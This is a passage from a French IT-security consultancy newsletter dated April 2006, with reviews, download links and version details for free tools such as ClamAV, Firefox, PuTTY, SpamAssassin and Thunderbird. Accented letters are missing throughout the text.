Cette solution est propose par la socit Promisec.
Cette entreprise, base en Isral, est la premire dve-
lopper une solution sans agent.

Loutil est entirement paramtrable et ne ncessite

pas dagent sur les machines audites.
Lapplication permet, au travers dune interface simple,
de rechercher une panoplie dinformations sur un rseau.

Les applications P2P, les types de fichiers prohibs

par votre politique, les priphriques connects, les logi-
ciels antivirus, les correctifs et Service Pack peuvent en

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 12

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

5. OUTILS LIBRES :
FOCUS SUR 5 PRODUITS LIBRES

Chaque mois, nous vous prsentons les outils libres qui nous paraissent indispensables. Les logiciels abords sont varis:
utilitaire de scurit et autres programmes ncessaires au sein dune entreprise.

Pour notre second numro, nous avons choisi danalyser des logiciels Internet, un client ssh et deux outils de scurit:
ClamAV et ClamWin: Antivirus libre et adpatables sous Unix et Windows
Firefox: devenu aussi clbre que IE est un Navigateur lger, efficace et pratique
Putty: Client SSH lger et ddi a Windows
SpamAssasin : Utilitaire de gestion de spams
Thunderbird : Client mail capable de rpondre tous vos besoins

Vous trouverez la fin de cette section un tableau rcapitulatif des versions de tous les logiciels prsents lors des prc-
dents numros dActu Scurit.

XMCO |Partners

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 13

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

ClamAntivirus
Antivirus
Version actuelle ClamAV et ClamWin 0.88
Utilit

Type Anti-virus pour Windows et distributions Linux

Description ClamAV est un anti-virus permettant de grer prs de 20000 signatures.
Cet outil est simple et efficace, les fonctions sont limites mais suffisent lar-
gement un utilisateur final. La seule ombre serait la protection rsidente
qui na pas t implmente. En effet, ClamAV ne scanne pas chaque fichier
copi ou tlcharg, il faut lancer un scan du dossier infect pour trouver le
fichier malsain.
ClamAV reste un bon antivirus, qui a lavantage dtre libre et gratuit.
Capture dcran

Tlchargement ClamAV 0.88 pour LINUX:

http://www.clamav.net/stable.php#pagestart

ClamWin 0.88 pour Windows:

http://www.clamwin.com/content/view/18/46/

Scurit de loutil Plusieurs failles ont t rapportes mais sont rapidement corriges grce la
participation de la communaut du libre:
http://secunia.com/product/2538/
Avis XMCO ClamAv est un outil libre qui s'avre particulirement efficace lorsqu'il est coupl
avec des logiciels comme Amavis et Dansguardian qui proposent des fonctionnalits
adaptes ClamAV. Ainsi cet antivirus peut devenir efficace sur des relais de messa-
gerie et rivaliser avec les principaux concurrents du march. Enfin la communaut
de dveloppeurs est trs ractive.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 14

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Firefox
Navigateur Internet
Version actuelle version 1.5, une version beta 2.0 est galement disponible
Utilit

Type Navigateur Internet

Description Longtemps relay au second plan derrire Internet Explorer, Firefox com-
mence devenir un navigateur Internet apprci de tous. Disponible sur les
trois plateformes Windows, Linux et Mac OS, le protg de la fondation
Mozilla na rien envier son concurrent. Lger, pratique, personnalisable,
cet outil se diffrencie par ses onglets permettant de naviguer sur plusieurs
sites partir dune seule fentre et une fonctionnalit de recherche est int-
gre. Linterface est intuitive et laspect scurit na pas t nglig. En effet,
Firefox bloque les pop-up, les virus, les publicits et les logiciels malveillants.
Enfin, les favoris dInternet Explorer peuvent tre imports et lensemble du
logiciel est facilement configurable.
Capture dcran

Tlchargement http://www.mozilla-europe.org/fr/products/firefox/
Scurit de loutil Comme tout logiciel utilis chaque jour par des millions de personnes, Fi-
refox souffre de nombreuses vulnrabilits dcouvertes chaque mois. Le
navigateur Internet tant le principal vecteur dexploitation dattaques di-
verses, les attaquants se focalisent plus particulirement sur ces utilitaires.
La liste des failles identifies est disponible ladresse ci-dessous:
http://secunia.com/product/4227/
Avis XMCO Firefox est un navigateur web qui doit tre diffus largement en entreprise. En effet,
ce logiciel n'a rien envier Internet Explorer et est moins touch par la publication
de vulnrabilits. Ce client web est donc une alternative simple et efficace.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 15

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Putty
Client SSH
Version actuelle Putty 0.58
Type Outil SSH, Telnet et Rlogin pour Windows
Utilit

Description Putty est un utilitaire indispensable pour les connexions SSH sous Windows.
Cest un des seuls outils pour le systme dexploitation de Microsoft per-
mettant de se connecter distance des serveurs en utilisant les protocoles
SSH. LIP des diffrents serveurs peut tre enregistre et toutes les options
sont configurables (couleurs, polices de caractres,). Il est galement pos-
sible de choisir entre SSH1 et SSH2, dutiliser le mode passif pour les ngo-
ciations Telnet ...
Cet outil est disponible pour tous les systmes Windows95, 98, ME, NT,
2000 et XP.
Capture dcran

Tlchargement http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Scurit de loutil Peu de failles ont t rapportes et ont causs des dnis de service
La liste des vulnrabilits est disponible ladresse ci-dessous:
http://secunia.com/product/4506/
Avis XMCO Putty est un client SSH efficace. De plus, la fonctionnalit de tunnel permet de crer
des VPN partir d'un serveur SSH. Cet outil lger et libre est donc un outil simple
adopter.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 16

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Spamassasin
Dispositif de filtre de spams
Version actuelle SpamAssassin 3.1.1
Utilit

Type Filtre demails malveillants

Description Spamassassin est un outil de gestion demails malveillants capable de filtrer
les courriels indsirables. Il utilise divers mcanismes bass sur: les enttes,
lanalyse du texte, une intelligence artificielle qui analyse le contenu de
lemail (filtre Bayes) et le blocage des DNS.
Ce logiciel doit tre install sur les serveurs et traitera les emails avant quils
soient reus par les clients de messagerie.
Capture dcran

Tlchargement Disponible pour les systmes Unix et Mac OS:

http://spamassassin.apache.org/downloads.cgi?update=200603111700

Scurit de loutil Peu de failles ont t rapportes et ont principalement causs des dnis de
service. La liste des vulnrabilits est disponible ladresse ci-dessous:
http://secunia.com/product/4506/
Avis XMCO Spamassassin est un outil tout aussi performant que la plupart des logiciels commer-
ciaux. De plus, la configuration et l'implmentation sont simples et rapides.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 17

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Thunderbird
Gestionnaire de mails et flux RSS
Version actuelle Thunderbird 1.5
Utilit

Type Messagerie et gestionnaire de flux RSS

Description Le dernier n de la fondation Mozilla se nomme Thunderbird. Ce client
mail complet est devenu une vritable rfrence. Supportant les protocoles
IMAP et POP, ainsi que le formatage des messages HTML, ce logiciel est
dot dune interface simple. Ce gestionnaire de mails permet de grer son
courrier lectronique facilement: plusieurs comptes peuvent tre grs en
parallle et fils RSS peuvent y tre intgrs. Du point de vue scurit, un
filtre des courriers indsirables a t implment, le chiffrement des messa-
ges et les certificats numriques peuvent galement tre grs. Cet outil est
disponible pour les trois plateformes Windows, Linux et MacOS X.
Capture dcran

Tlchargement http://www.mozilla-europe.org/fr/products/thunderbird/
Scurit de loutil Quelques failles ont t reportes mais sont rapidement corriges par les
dveloppeurs. La liste des vulnrabilits de Thunderbird est disponible
ladresse ci-dessous:
http://secunia.com/product/4652/
Avis XMCO Thunderbird est un mailer complet qui est indispensable pour un client final. Il ap-
porte la simplicit et les fonctions des clients mails les plus avancs mais n'est pas un
groupware comme Exchange ou Lotus Notes.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 18

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Suivi des versions

Version actuelle des outils libres prsents dans les nu-
mros prcdents.

Nom Dernire version Date Lien

Debian Sarge Version stable 3.1 http://www.debian.org/CD/netinst/
Snort 2.4.4 08/03/2006 http://www.snort.org/dl/
MySQL 5.0.19 http://dev.mysql.com/downloads/mysql/5.0.html
5.1.7-Bta http://dev.mysql.com/downloads/mysql/5.1.html
Apache 2.2.0 05/12/2005 http://www.apachefrance.com/Telechargement/4/
1.3.34 16/10/2005 http://www.apachefrance.com/Telechargement/4/
Nmap 4.01 11/02/2005 http://www.insecure.org/nmap/download.html

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 19

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 20

www.xmcopartners.com